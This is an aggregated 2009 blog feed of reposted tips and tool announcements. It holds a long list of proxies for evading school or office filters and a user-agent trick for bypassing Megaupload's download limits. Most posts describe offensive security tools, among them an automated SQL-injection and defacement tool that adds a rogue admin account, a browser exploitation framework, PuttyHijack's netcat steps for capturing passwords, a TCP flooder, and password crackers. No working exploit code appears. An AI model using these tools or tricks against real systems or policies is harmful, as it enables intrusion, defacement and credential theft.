• Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
• That is be the IP address of the sender!
Finding IP Address of the sender in Gmail!!
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender.
• Log into your Gmail account with your username and password.
• Open the mail.
• To display the headers,
o Click on More options corresponding to that thread. You should get a bunch of links. Click on Show original
• You should get headers like this:
o Gmail headers : Daniel
• Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245.
• That is being the IP address of the sender!!
NOTE: =
This will not work if the sender uses anonymous proxy servers.

A list of fully working proxies,

2009-01-03T04:15:00.000-08:00

A list of fully working proxies, In this website, there are many pages which refer to proxies in the articles, but very few are mentioned. But my research has yielded the following working proxies.
WARNING: these proxies may or may not work depending on content filtering provider that your school/office uses. For example, for me, only 6 of them work, but my friend has claimed that except for 5, all of his worked.

So, my advice would be to use all of them and see which ones suit your needs:

http://www.ecrossx.com
http://www.mathtunnel.com

http://www.xtrememuppet.com
http://www.ibypass.com
http://www.ibypass.name
http://iamscrewed.info
http://www.proxyjag.info
http://ps3shakers.com
http://ramboproxy.info
http://www.neoproxy.org
http://www.BeboTube.info

http://www.ioop.info
http://www.iamscrewed.info
http://neoproxy.org
http://ps3shakers.com
http://ramboproxy.info
http://proxyjag.info
http://www.proxy-listing.com
http://iphider.org
http://linkstoswap.com
http://www.prox- today.com
http://www.version10.info
http://www.iamscrewed.info
http://www.Waz-warez.com
Neo Proxy: http://www.neoproxy.org/
IP hider Proxy: http://www.iphider.org/
Proxy for you: http://www.ps3shakers.com/
www.linkstoswap.com
Proxy listing
Iklanoke.com
www.gradesaver.info
ioop proxy::: http://www.ioop.info/
www.proxyjag.info
www.ramboproxy.info
http://www.ProxyGerm.info

http://ganjascape.co.uk/hideme
http://lawquiz.info
http://tech.groups.yahoo.com/group/Proxy...
http://z613effect.blogspot.com
http://www.squidoo.com/myspaceunblock
http://www.proxymax.info
http://www.proxytv.info
http://www.beeprox.org
http://www.iproxi.info
http://www.cellproxy.info
http://www.tproxy.info
http://duggmirror.com/security/A_Top_10_...
http://llty.info
https://wealize.info
http://apbiology.info/
imfine.info
http://sourcheese.com/
http://www.facprox.info
http://www.freevisit.info
http://www.hidemyclick.info
http://www.myproxie.info
http://www.freeproksea.info
http://www.freeproxie.info
http://www.surffreely.info
http://www.gofreely.info
http://www.rapidbrowse.info
http://www.surfexpress.info
http://www.rapidsurfing.info
http://www.surfhost.info
http://www.rapidvisit.info
http://www.massvisit.info
http://www.rapidproxie.info
http://www.rapidproksea.info
http://www.easyvisit.info
http://www.rapidaccess.info
http://www.freerelease.info
http://www.freesight.info
http://www.quicksight.info
http://www.takefreely.info
http://www.allfreehere.info
http://www.greenpips.info
http://www.proxyzip.org
http://www.hagiomusic.info
http://www.ghostproxy2.com/
proxyninja.com
ninjaproxy.com
virtual-browser.com
http://www.webthese.com
http://www.cantblock.us
www.secuproxy.com
spyonyou.com
http://www.youcantstopme.info
http://www.thewayin.info
gounblock.info
allenjones.info
allunblock.info
unblockman.info
flowermagic.info
freeartstore.info
goodbypass.info
surfstream.info
unblockdomain.info
surfview.info
wtfnoob.info
chrisgodfrey.info
viewstuff.info
mrunblock.info
getpastblocksite.info
topbypass.info
viewmagic.info
glidesite.info
unblockland.com
funbypass.info
unblocktool.info
trycatchme.com
visiblenot.com
anonsafe.com
http://MATH1.INFO
http://MATH2.INFO
http://MATHTIPS.INFO
http://omgimatschool.info
http://tutordept.info
Http://proxy.zdojo.com
http://www.igotaccess.info
http://kasandra.nz.gs
http://www.proxynyc.com
http://www.ip-shield.info
http://www.wikideals.co.uk
http://www.dontlearn.info
www.youth.exofire.net/server2
http://www.igotaccess.info
http://byeblock.info/
http://www.pagemod.com
http://www.xamal.org
http://www.xamal.com
http://www.xamal.net
http://www.xamal.info
http://www.xamal.biz
http://www.xamal.name
http://www.payday2006.com/proxies
http://www.payday2007.com
http://www.unprohibited.org
http://www.outsmarted.org
www.sawme.co.nr
http://www.iwillsurf.com
http://www.9kg.info
http://www.avoidfilter.info
http://www.d3r.info
http://www.demonproxy.info
http://www.goinsites.com (US, PHProxy 0.5)
http://www.alexscronce.info (US, PHProxy 0.5)
http://www.allagent.info (US, PHProxy 0.5)
http://www.allenjones.info (US, PHProxy 0.5)
http://www.allunblock.info (US, PHProxy 0.5)
http://www.artridge.info (US, PHProxy 0.5)
http://www.bestglide.info (US, PHProxy 0.5)
http://www.bluetime.info (US, PHProxy 0.5)
http://www.browsefly.info (US, PHProxy 0.5)
http://www.browsehelp.info (US, PHProxy 0.5)
http://www.browseland.info (US, PHProxy 0.5)
http://www.browsemagic.info (US, PHProxy 0.5)
http://www.browseman.info (US, PHProxy 0.5)
http://www.browsepc.info (US, PHProxy 0.5)
http://www.browsespot.info (US, PHProxy 0.5)
http://www.browsestuff.info (US, PHProxy 0.5)
http://www.browsetime.info (US, PHProxy 0.5)
http://www.browseworld.info (US, PHProxy 0.5)
http://www.browsezone.info (US, PHProxy 0.5)
http://www.buyman.info (US, PHProxy 0.5)
http://www.bypasscity.info (US, PHProxy 0.5)
http://www.bypassmyspaceunblock.info (US, PHProxy 0.5)
http://www.bypasspage.info (US, PHProxy 0.5)
http://www.bypasstool.info (US, PHProxy 0.5)
http://www.cardog.info (US, PHProxy 0.5)
http://www.chadscronce.info (US, PHProxy 0.5)
http://www.cheappet.info (US, PHProxy 0.5)
http://www.chrisgodfrey.info (US, PHProxy 0.5)
http://www.computermyspaceschoolunblock.... (US, PHProxy 0.5)
http://www.computerview.info (US, PHProxy 0.5)
http://www.comview.info (US, PHProxy 0.5)
http://www.coolbypass.info (US, PHProxy 0.5)
http://www.coolfix.info (US, PHProxy 0.5)
http://www.coolstar.info (US, PHProxy 0.5)
http://www.coolunblock.info (US, PHProxy 0.5)
http://www.coolview.info (US, PHProxy 0.5)
http://www.cotywiat.info (US, PHProxy 0.5)
http://www.discountpet.info (US, PHProxy 0.5)
http://www.domainbrowse.info (US, PHProxy 0.5)
http://www.domainunblock.info (US, PHProxy 0.5)
http://www.dotagent.info (US, PHProxy 0.5)
http://www.dothouse.info (US, PHProxy 0.5)
http://www.dreamglide.info (US, PHProxy 0.5)
http://www.dreamview.info (US, PHProxy 0.5)
http://www.easyglide.info (US, PHProxy 0.5)
http://www.ecoboy.info (US, PHProxy 0.5)
http://www.eglide.info (US, PHProxy 0.5)
http://www.eunblock.info (US, PHProxy 0.5)
http://www.facebookfirewallunblock.info (US, PHProxy 0.5)
http://www.fastgear.info (US, PHProxy 0.5)
http://www.fastglide.info (US, PHProxy 0.5)
http://www.fastme.info (US, PHProxy 0.5)
http://www.filmco.info (US, PHProxy 0.5)
http://www.filteroff.com (US, PHProxy 0.5)
http://www.findbypass.info (US, PHProxy 0.5)
http://www.findview.info (US, PHProxy 0.5)
http://www.flowerchoice.info (US, PHProxy 0.5)
http://www.flowermagic.info (US, PHProxy 0.5)
http://www.flowerplus.info (US, PHProxy 0.5)
http://www.flowerway.info (US, PHProxy 0.5)
http://www.flydog.info (US, PHProxy 0.5)
http://www.flypage.info (US, PHProxy 0.5)
http://www.flystuff.info (US, PHProxy 0.5)
http://www.flyview.info (US, PHProxy 0.5)
http://www.freeartstore.info (US, PHProxy 0.5)
http://www.freeglide.info (US, PHProxy 0.5)
http://www.freeking.info (US, PHProxy 0.5)
http://www.funagent.info (US, PHProxy 0.5)
http://www.funbrowse.info (US, PHProxy 0.5)
http://www.funbypass.info (US, PHProxy 0.5)
http://www.funglide.info (US, PHProxy 0.5)
http://www.funlight.info (US, PHProxy 0.5)
http://www.funstar.info (US, PHProxy 0.5)
http://www.funview.info (US, PHProxy 0.5)
http://www.getagent.info (US, PHProxy 0.5)
http://www.getlight.info (US, PHProxy 0.5)
http://www.getmagic.info (US, PHProxy 0.5)
http://www.getpastblocksite.info (US, PHProxy 0.5)
http://www.getpastfirewall.info (US, PHProxy 0.5)
http://www.getpastsonicwall.info (US, PHProxy 0.5)
http://www.getunblock.info (US, PHProxy 0.5)
http://www.getview.info (US, PHProxy 0.5)
http://www.glideit.info (US, PHProxy 0.5)
http://www.glideland.info (US, PHProxy 0.5)
http://www.glidenow.info (US, PHProxy 0.5)
http://www.glideplus.info (US, PHProxy 0.5)
http://www.glidesite.info (US, PHProxy 0.5)
http://www.glidespot.info (US, PHProxy 0.5)
http://www.glidestuff.info (US, PHProxy 0.5)
http://www.glidezone.info (US, PHProxy 0.5)
http://www.goagent.info (US, PHProxy 0.5)
http://www.gobypass.info (US, PHProxy 0.5)
http://www.gochoice.info (US, PHProxy 0.5)
http://www.goglide.info (US, PHProxy 0.5)
http://www.goodbypass.info (US, PHProxy 0.5)
http://www.goodglide.info (US, PHProxy 0.5)
http://www.goodstar.info (US, PHProxy 0.5)
http://www.goodunblock.info (US, PHProxy 0.5)
http://www.gounblock.info (US, PHProxy 0.5)
http://www.guitarpart.info (US, PHProxy 0.5)
http://www.hackingsue.wetpaint.com
http://www.hotcenter.info (US, PHProxy 0.5)
http://www.hotflowers.info (US, PHProxy 0.5)
http://www.howtounblockschoolfirewall.in... (US, PHProxy 0.5)
http://www.howtounblockwebsites.info (US, PHProxy 0.5)
http://www.interfix.info (US, PHProxy 0.5)
http://www.interspot.info (US, PHProxy 0.5)
http://www.intertime.info (US, PHProxy 0.5)
http://www.joeymonday.info (US, PHProxy 0.5)
http://www.keynow.info (US, PHProxy 0.5)
http://www.lindsayday.info (US, PHProxy 0.5)
http://www.mrbrowse.info (US, PHProxy 0.5)
http://www.mrglide.info (US, PHProxy 0.5)
http://www.mrunblock.info (US, PHProxy 0.5)
http://www.mrview.info (US, PHProxy 0.5)
http://www.myfix.info (US, PHProxy 0.5)
http://www.myglide.info (US, PHProxy 0.5)
http://www.mymusicpro.info (US, PHProxy 0.5)
http://www.mysapceunblock.info (US, PHProxy 0.5)
http://www.myspaceunblockways.info (US, PHProxy 0.5)
http://www.myspaceunblockwork.info (US, PHProxy 0.5)
http://www.mysymphony.info (US, PHProxy 0.5)
http://www.nohelp.info (US, PHProxy 0.5)
http://www.onconnect.info (US, PHProxy 0.5)
http://www.onlineunblock.info (US, PHProxy 0.5)
http://www.onschool.info (US, PHProxy 0.5)
http://www.onstuff.info (US, PHProxy 0.5)
http://www.openfix.info (US, PHProxy 0.5)
http://www.ourbox.info (US, PHProxy 0.5)
http://www.ourbypass.info (US, PHProxy 0.5)
http://www.ourglide.info (US, PHProxy 0.5)
http://www.ourunblock.info (US, PHProxy 0.5)
http://www.ownsonicwall.info (US, PHProxy 0.5)
http://www.partydog.info (US, PHProxy 0.5)
http://www.pcbrowse.info (US, PHProxy 0.5)
http://www.pcbypass.info (US, PHProxy 0.5)
http://www.pcgirl.info (US, PHProxy 0.5)
http://www.pcglide.info (US, PHProxy 0.5)
http://www.pchosting.info (US, PHProxy 0.5)
http://www.pclist.info (US, PHProxy 0.5)
http://www.pcpage.info (US, PHProxy 0.5)
http://www.pcseek.info (US, PHProxy 0.5)
http://www.pettreat.info (US, PHProxy 0.5)
http://www.playlink.info (US, PHProxy 0.5)
http://www.playplus.info (US, PHProxy 0.5)
http://www.probypass.info (US, PHProxy 0.5)
http://www.proglide.info (US, PHProxy 0.5)
http://www.prostream.info (US, PHProxy 0.5)
http://www.rc2.info (US, PHProxy 0.5)
http://www.redview.info (US, PHProxy 0.5)
http://www.schoolmyspaceunblock.info (US, PHProxy 0.5)
http://www.schoolsiteunblock.info (US, PHProxy 0.5)
http://www.schoolspaceunblock.info (US, PHProxy 0.5)
http://www.sellchat.com (US, PHProxy 0.5)
http://www.sethpowell.info (US, PHProxy 0.5)
http://www.sitetounblockwebsite.info (US, PHProxy 0.5)
http://www.skystuff.info (US, PHProxy 0.5)
http://www.smartglide.info (US, PHProxy 0.5)
http://www.smartunblock.info (US, PHProxy 0.5)
http://www.spaceunblock.info (US, PHProxy 0.5)
http://www.sunmagic.info (US, PHProxy 0.5)
http://www.supermanproxy.com (US, Glype)
http://www.surfco.info (US, PHProxy 0.5)
http://www.surfconnect.info (US, PHProxy 0.5)
http://www.surfgames.info (US, PHProxy 0.5)
http://www.surfgo.info (US, PHProxy 0.5)
http://www.surfhelp.info (US, PHProxy 0.5)
http://www.surflist.info (US, PHProxy 0.5)
http://www.surfmap.info (US, PHProxy 0.5)
http://www.surfnetwork.info (US, PHProxy 0.5)
http://www.surfsearch.info (US, PHProxy 0.5)
from mmitpros

Megaupload unlimited downloads

2009-01-03T03:13:00.000-08:00

Megaupload unlimited downloads

Posted on 08. Aug, 2008 by raymond in Computer, Tips and Trick

Many people sometime have a problems when download from Megaupload.com. Here some solution that you can try to get unlimited download from megaupload like premium user.

Here are the steps:

1 ) If you already download Megaupload toolbar and installed on your computer, uninstall it first as it contains a spyware

2 ) Download Mozilla Firefox browser

3 ) After Install firefox, get firefox user agent switcher extension from here.

4 ) After add this addon, go to:

menu —> Tool —> user agent swither —> option —> add

5 ) Follow this to fill up the form there:

Description : MEGAUPLOAD
User agent : Mozilla/4.0 ( compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar )

Finish and before download from megaupload go to

tool —> user agent —> megaupload

and then you should be able to download from megaupload
from bloggeraz

How to detect rapidshare happyhour

2009-01-03T03:04:00.001-08:00

Rapidshare now comes back again with its Happy Hour. Lucky me, I had a chance to enjoy it yesterday. For those who are not familiar with this feature, it's actually a limited time frame provided by Rapidshare where free users don't have to input the "cats" CAPTCHAs and enjoy the same privilege as premium users (free unlimited download). Since this Happy Hour doesn't take place on regular basis (only opened when there's luxury of bandwidth), I'm sure our chance of finding Happy Hour is pretty slim.

Haris over at SIzzleCore has a nice share on how to get around this problem. Happy Cat, named after new feature in Rapidshare's CAPTCHA system, is a useful tool in detecting Happy Hour time. This little application will be running in the taskbar and will buzz you to let you know about Happy Hour time. So this application will ensure you to make full use of Rapidshare's generosity.

In order to make this little application fully functional you need to install Microsoft .NET Framework 3.5.

Mirror links:

Mirror 1 | Mirror 2

[via: Sizlopedia.com]

MultiInjector v0.3 Released - Automatic SQL Injection and Defacement Tool

2009-01-03T02:57:00.000-08:00

MultiInjector v0.3 Released - Automatic SQL Injection and Defacement Tool

You might remember a while ago we posted about MultiInjector which claims to the first configurable automatic website defacement tool, it got quite a bit of interest and shortly after that it was updated. Anyway, good or bad I think people deserve to know what is out there.

Features

* Receives a list of URLs as input
* Recognizes the parameterized URLs from the list
* Fuzzes all URL parameters to concatenate the desired payload once an injection is successful
* Automatic defacement - you decide on the defacement content, be it a hidden script, or just pure old “cyber graffiti” fun
* OS command execution - remote enabling of XP_CMDSHELL on SQL server, subsequently running any arbitrary operating system command lines entered by the user
* Configurable parallel connections exponentially speed up the attack process - one payload, multiple targets, simultaneous attacks
* Optional use of an HTTP proxy to mask the origin of the attacks

Changes

* Automatic defacement - Try to concatenate a string to all user-defined text fields in DB
* Run any OS command as if you’re running a command console on the DB machine
* Execute SQL commands of your choice
* Enable OS shell procedure on DB - Revive the good old XP_CMDSHELL where it was turned off
* Add administrative user to DB server with password: T0pSeKret
* Enable remote desktop on DB server
* Fixed nvarchar cast to varchar. Verified against MS-SQL 2000
* Added numeric / string parameter type detection
* Improved defacement content handling by escaping quotation marks
* Improved support for Linux systems
* Fixed the “invalid number of concurrent connections” failure due to non-parameterized URLs

You can download MultiInjector v0.3 here

MultiInjectorV0.3.tar.gz

Or read more here.
from darknet

sqlmap 0.6.3 Released - Automatic SQL Injection Tool

2009-01-03T02:56:00.001-08:00

sqlmap 0.6.3 Released - Automatic SQL Injection Tool

sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more..

Changes

Some of the new features include:

* Major enhancement to get list of targets to test from Burp proxy requests log file path or WebScarab proxy ‘conversations/’ folder path with option -l;
* Major enhancement to support Partial UNION query SQL injection technique;
* Major enhancement to test if the web application technology sup ports stacked queries (multiple statements) by providing option –stacked-test which will be then used someday also by takeover functionality;
* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option –time-test;
* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM
there is no database name specified;

Complete ChangeLog

You can download sqlmap 0.6.3 here:

sqlmap-0.6.3.tar.gz (Linux)
sqlmap-0.6.3_exe.zip (Windows)

Or read more here (User Manual).
from darknet

Complemento v0.4b - LetDown TCP Flooder, ReverseRaider Subdomain Scanner & Httsquash HTTP Server Scanner Tool

2009-01-03T02:55:00.000-08:00

Complemento v0.4b - LetDown TCP Flooder, ReverseRaider Subdomain Scanner & Httsquash HTTP Server Scanner Tool

An interesting collection of tools for pen-testing including a DoS tool (something you don’t often see publicly released).

Complemento is a collection of tools that the author originally created for his own personal toolchain for solving some problems or just for fun. Now he has decided to release it to the public.

The Tools

LetDown is a TCP flooder written after the author read the article by fyodor entitled article “TCP Resource Exhaustion and Botched Disclosure“.
ReverseRaider is a domain scanner that uses brute force wordlist scanning for finding a target sub-domains or reverse resolution for a range of ip addresses. This is similar to some of the functionality in DNSenum.

Httsquash is an HTTP server scanner, banner grabber and data retriever. It can be used for scanning large ranges of IP addresses and finding devices or HTTP servers (there is an alpha version of a GUI for this).

You can download Complemento v0.4b here:

complemento-0.4b

Or read more here.
from darknet

The World’s Fastest MD5 Cracker - BarsWF

2009-01-03T02:51:00.000-08:00

The World’s Fastest MD5 Cracker - BarsWF

BarsWF is basically an MD5 cracking tool and at the moment, is currently the fastest. Right now on nVidia 9600GT/C2D 3Ghz CUDA version does 350 M keys/sec, SSE2 version does 108 M keys/sec. You may check benchmarks of all known good MD5 bruteforcers here.

Changes in 0.8

* Added checks for errors when calling CUDA kernel.
* Now you can specify custom characters for charset using -X switch.
* You may specify minimal password length using -min_len.
* Save/restore feature added. State is being stored to barswf.save every 5 minutes or on exit. You may continue computation using -r switch. You may manually edit .save file to distribute job on several computers (but this is up to you - it is quite simple and non-documented ). BarsWF will also write found password into barswf.save at the end.
* Improved speed for cards GTX260, GTX280, 8800GT, 9600GSO, 8800GS, 8800GTS - by approximately 10%, all other cards will get just 1-2%.

System Requirements

* CUDA version only:nVidia GeForce 8xxx and up, at least 256mb of video memory.
* LATEST nVidia-driver with CUDA support.Standard drivers might be a bit older (as CUDA 2.0 is still beta)
* CPU with SSE2 support (P4, Core2Duo, Athlon64, Sempron64, Phenom).
* Recommended 64-bit OS (WinXP 64 or Vista64). 32-bit version is also available.

Download BarsWF 0.8 here:

CUDA:
BarsWF CUDA x64
BarsWF CUDA x32

SSE2:
BarsWF SSE x64
BarsWF SSE x32

Or read more here. (Thanks Navin)
from darknet

FireCAT 1.4 Released - Firefox Catalog of Auditing Extensions

2009-01-03T02:49:00.000-08:00

FireCAT 1.4 Released - Firefox Catalog of Auditing Extensions

FireCAT (Firefox Catalog of Auditing exTension) is a mindmap collection of the most efficient and useful firefox extensions oriented application security auditing and assessment

You can find an online map of Firecat v1.4 here.

Changes for version 1.4

Information Gathering (Enumeration and Fingerprinting)

* Passive Recon : PassiveRecon allows Information Security professionals the ability to perform “packetless” discovery of target resources utilizing publicly available information

Security Auditing

* Selenium IDE : Selenium is a test tool for web applications. Selenium tests run directly in a browser, just like real users do
* RESTTest : Construct custom HTTP requests to directly test requests against a server. RESTTest uses the XmlHttpRequest object and allows you to simulate XHR to quickly prototype requests and test security problems. Designed specifically for working with REST sources, supporting all HTTP methods
* Acunetix Firefox plugin: Read here a good review by Kev Orrey. Extension submitted by Kev Orrey from VulnerabilityAssessment

IT Security Related

* Added Milw0rm Exploits Search

Fixes

* Fixed HashMDTool link
* Fixed OSVB extension link
* Fixed US Homeland Security Threat link

You can download FireCAT v1.4 here:

FireCAT 1.4 Source (Zip - 4.6 kb)
FireCAT 1.4 Browsable HTML (Zip - 37.2 kb)
FireCAT 1.4 pdf (PDF - 186.3 kb)

You can actually wget all the tools from here:

http://phrack.fr/tools/FireCAT-1.4

Or read more here.
from darknet

Browser Rider - Web Browser Exploitation Framework

2009-01-03T02:47:00.000-08:00

Browser Rider - Web Browser Exploitation Framework

Browser Rider is a hacking framework to build payloads that exploit the browser. The project aims to provide a powerful, simple and flexible interface to any client side exploit.

Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmaintained, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.

Features

* Easily create powerful payloads and plugins
* Manage payloads automatically with plugins
* All data can be saved in a database
* Obfuscation
* Polymorphism
* Control more than one zombie at a time
* Simple administration panel

Requirements

* PHP 5, with json installed
* Mysql
* Apache with url_rewrite on
* Targets must have Javascript turned on

You can download Browser Rider here:

Browser Rider v20081124 (changelog)

Or read more here.
from darknet

ike-scan - IPsec VPN Scanning, Fingerprinting and Testing Tool

2009-01-03T02:45:00.000-08:00

ike-scan - IPsec VPN Scanning, Fingerprinting and Testing Tool

ike-scan is a command-line tool for discovering, fingerprinting and testing IPsec VPN systems. It constructs and sends IKE Phase-1 packets to the specified hosts, and displays any responses that are received.

ike-scan allows you to:

* Send IKE packets to any number of destination hosts, using a configurable output bandwidth or packet rate. (This is useful for VPN detection, when you may need to scan large address spaces.)
* Construct the outgoing IKE packet in a flexible way. (This includes IKE packets which do not comply with the RFC requirements.)
* Decode and display any returned packets.
* Crack aggressive mode pre-shared keys. (You can use ike-scan to obtain the PSK hash data, and then use psk-crack to obtain the key.)

You can read more in depth about ike-scan and how to use it - in the User Guide.

ike-scan is free software, licensed under the GPL. It runs on Windows, Linux and most Unix systems. If you don’t already have ike-scan installed on your system, read the installation guide.

You can download ike-scan 1.9 here:

Source distribution: ike-scan-1.9.tar.gz
Windows binary: ike-scan-win32-1.9.zip

Older versions of ike-scan

Or read more here.
from darknet

MultiInjector - Automated Stealth SQL Injection Tool

2009-01-03T02:43:00.000-08:00

MultiInjector - Automated Stealth SQL Injection Tool

MultiInjector claims to the first configurable automatic website defacement software, I’m not sure if that’s a good thing - or a bad thing.

But well here it is anyway.

Features

* Receives a list of URLs as input
* Recognizes the parameterized URLs from the list
* Fuzzes all URL parameters to concatenate the desired payload once an injection is successful
* Automatic defacement - you decide on the defacement content, be it a hidden script, or just pure old “cyber graffiti” fun
* OS command execution - remote enabling of XP_CMDSHELL on SQL server, subsequently running any arbitrary operating system command lines entered by the user
* Configurable parallel connections exponentially speed up the attack process - one payload, multiple targets, simultaneous attacks
* Optional use of an HTTP proxy to mask the origin of the attacks

The author highly recommend running a HTTP sniffer such as IEInspector HTTP Analyzer in order to see all attack requests going out to the targets.

Requirements

* Python >= 2.4
* Pycurl (compatible with the above version of Python)
* Psyco (compatible with the above version of Python)

You can download MultiInjector v0.2 here:

MultiInjector.py

Or read more here.
from darknet

Gooscan - Automated Google Hacking Tool

2009-01-03T02:42:00.000-08:00

Gooscan - Automated Google Hacking Tool

Whilst reading an article the other day I saw this mentioned and realised I haven’t written about this yet either, although I have written about the similar tool Goolag.

What is Gooscan?

Gooscan is a tool that automates queries against Google search appliances, but with a twist. These particular queries are designed to find potential vulnerabilities on web pages. Think “cgi scanner” that never communicates directly with the target web server, since all queries are answered by a Google appliance, not by the target itself.

Who is it written for?

Security professionals: This tool serves as a front-end for an external web server assessment and aids in the “information gathering” phase of a vulnerability assessment.

Web server administrators: This tool helps to discover what the web community may already know about you thanks to Google.

Is this tool legal?

From Google ToS - “You may not send automated queries of any sort to Google’s system without express permission in advance from Google.”

This means that you should not use this tool to query Google without advance express permission. Google appliances, however, do not have these limitations. You should, however, obtain advance express permission from the owner or maintainer of the Google appliance before searching it with
any automated tool for various legal and moral reasons.

The author wrote this tool not to violate Google’s terms of service (ToS), but to raise the awareness of the web security community that a ToS may not discourage the bad guys from writing and running a tool like this for malicious purposes. To that end, only use this tool to query _appliances_ unless you are prepared to face the (as yet unquantified) wrath of Google.

Why the proxy feature?

Many companies can only reach the Internet by way of an internal proxy server. When conducting an authorized assessment, it may be necessary to bounce queries of of a web proxy instead of off the Google appliance directly.

You can download Gooscan v1.0 here:

Gooscan v1.0
from darknet

Web-Harvest - Web Data Extraction Tool

2009-01-03T02:39:00.000-08:00

Web-Harvest - Web Data Extraction Tool

Web-Harvest is Open Source Web Data Extraction tool written in Java. It offers a way to collect desired Web pages and extract useful data from them. In order to do that, it leverages well established techniques and technologies for text/xml manipulation such as XSLT, XQuery and Regular Expressions. Web-Harvest mainly focuses on HTML/XML based web sites which still make vast majority of the Web content. On the other hand, it could be easily supplemented by custom Java libraries in order to augment its extraction capabilities.

Process of extracting data from Web pages is also referred as Web Scraping or Web Data Mining. World Wide Web, as the largest database, often contains various data that we would like to consume for our needs. The problem is that this data is in most cases mixed together with formatting code - that way making human-friendly, but not machine-friendly content. Doing manual copy-paste is error prone, tedious and sometimes even impossible. Web software designers usually discuss how to make clean separation between content and style, using various frameworks and design patterns in order to achieve that. Anyway, some kind of merge occurs usually at the server side, so that the bunch of HTML is delivered to the web client.

Every Web site and every Web page is composed using some logic. It is therefore needed to describe reverse process - how to fetch desired data from the mixed content. Every extraction procedure in Web-Harvest is user-defined through XML-based configuration files. Each configuration file describes sequence of processors executing some common task in order to accomplish the final goal. Processors execute in the form of pipeline. Thus, the output of one processor execution is input to another one. This can be best explained using the simple configuration fragment:

When Web-Harvest executes this part of configuration, the following steps occur:

1. http processor downloads content from the specified URL.
2. html-to-xml processor cleans up that HTML producing XHTML content.
3. xpath processor searches specific links in XHTML from previous step giving URL sequence as a result.

Web-Harvest supports a set of useful processors for variable manipulation, conditional branching, looping, functions, file operations, HTML and XML processing, exception handling. See User manual for technical description of provided processors.

You can download Web-Harvest 1.0 here:

webharvest1-exe.zip

Or read more here.
from darknet

PorkBind v1.3 - Nameserver (DNS) Security Scanner

2009-01-03T02:38:00.000-08:00

PorkBind v1.3 - Nameserver (DNS) Security Scanner

This program retrieves version information for the nameservers of a domain and produces a report that describes possible vulnerabilities of each.

Vulnerability information is configurable through a configuration file; the default is porkbind.conf. Each nameserver is tested for recursive queries and zone transfers. The code is parallelized with libpthread.

Changes for v1.3

* Wrote in-a-bind shell script that scans random domain names from DMOZ
* Implemented recursive query testing
* Changed porkbind.conf to use CVE numbers in addition to CERT alerts
* Modified text displayed on stdout to make it more parsable
* Licensed with GNU Lesser General Public License
* Fixed timeout/concurrency/memory corruption bugs
* Fixed improper comparison of alpha/beta version numbering bug
* Added typecasts to silence compiler warnings

The tool now scans for 14 flaws and reports CVE numbers & CERT.

You can download PorkBind v1.3 here:

porkbind-1.3.tar.gz

Or read more here.
from darknet

PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows

2009-01-03T02:37:00.000-08:00

PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows

PuttyHijack is a POC tool that injects a dll into the PuTTY process to hijack an existing, or soon to be created, connection.

This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a
callback connection that is then used for input/output redirection.

It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.

Details

1) Start a nc listener
2) Run PuttyHijack specify the listener ip and port
3) Watch the echoing of everything including passwords

Some basic commands in this version include;

!disco - disconnect the real putty from the display
!reco - reconnect it
!exit - just another way to exit the injected shell

You can download PuttyHijack V1.0 here:

PuttyHijackV1.0.rar
Or read more here.

SIPcrack - SIP Login Dumper & Hash/Password Cracker

2009-01-03T02:36:00.000-08:00

SIPcrack - SIP Login Dumper & Hash/Password Cracker

SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.

The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.

If you don’t have OpenSSL installed or encounter any building problems try ‘make no-openssl’ to build with integrated MD5 function (which is slower than the OpenSSL implementation).

Usage

Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. See ’sipdump -h’ for options.

Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated See ’sipcrack -h’ for options.

You can download SIPcrack here:

SIPcrack-0.3pre.tar.gz

Or read more here.
from darknet

Zodiac - DNS Protocol Monitoring and Spoofing Tool

2009-01-03T02:35:00.000-08:00

Zodiac - DNS Protocol Monitoring and Spoofing Tool

Zodiac is a DNS protocol analyzation and exploitation program. It is a robust tool to explore the DNS protocol. Internally it contains advanced DNS routines for DNS packet construction and disassembling and is the optimal tool if you just want to try something out without undergoing the hassle to rewrite DNS packet routines or packet filtering.

Features

* sniffing on all kinds of configured devices (Ethernet, PPP, …)
* capturing and decoding nearly all types of DNS packets, including packet decompression
* ncurses driven text based frontend with interactive commandline and multiple windows
* threaded design allow more flexibility when adding your own features
* clean code, commented and tested just fine, ready for you to extend
* internal DNS packet filtering allows installation of pseudo DNS filters you can “select()” on a large set of DNS packet construction primitives
* DNS name server versioning using BIND version requests
* DNS local spoofing, answering DNS queries on your LAN before the remote NS
* DNS jizz spoofing, exploiting a weakness within old BIND versions
* DNS ID spoofing, exploiting a weakness within the DNS protocol itself

You can download Zodiac 0.4.9 here:

zodiac-0.4.9.tar.gz

Or read more here.

DNSenum - Domain Information Gathering Tool

2009-01-03T02:33:00.000-08:00

DNSenum - Domain Information Gathering Tool

The first stage of penetration testing is usually passive information gathering and enumeration (active information gathering). This is where tools like dnsenum come in, the purpose of DNSenum is to gather as much information as possible about a domain.

The program currently performs the following operations:

1. Get the host’s addresse (A record).
2. Get the namservers (threaded).
3. Get the MX record (threaded).
